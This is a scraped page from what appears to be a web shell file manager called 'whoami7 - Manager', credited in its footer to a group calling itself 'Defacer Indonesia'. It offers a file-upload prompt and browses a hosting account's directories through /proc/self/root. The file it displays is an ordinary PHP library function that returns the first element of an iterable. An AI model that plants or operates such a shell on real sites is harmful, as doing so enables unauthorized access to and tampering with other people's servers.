whoami7 - Manager
:
/
proc
/
self
/
root
/
home
/
kckglobal
/
public_html
/
portal
/
vendor
/
azjezz
/
psl
/
src
/
Psl
/
Iter
/
Upload File:
files >> //proc/self/root/home/kckglobal/public_html/portal/vendor/azjezz/psl/src/Psl/Iter/first.php
<?php declare(strict_types=1); namespace Psl\Iter; /** * Returns the first element of an iterable, if the iterable is empty, null will be returned. * * @template T * * @param iterable<T> $iterable * * @return T|null */ function first(iterable $iterable) { foreach ($iterable as $v) { return $v; } return null; }
Copyright ©2021 || Defacer Indonesia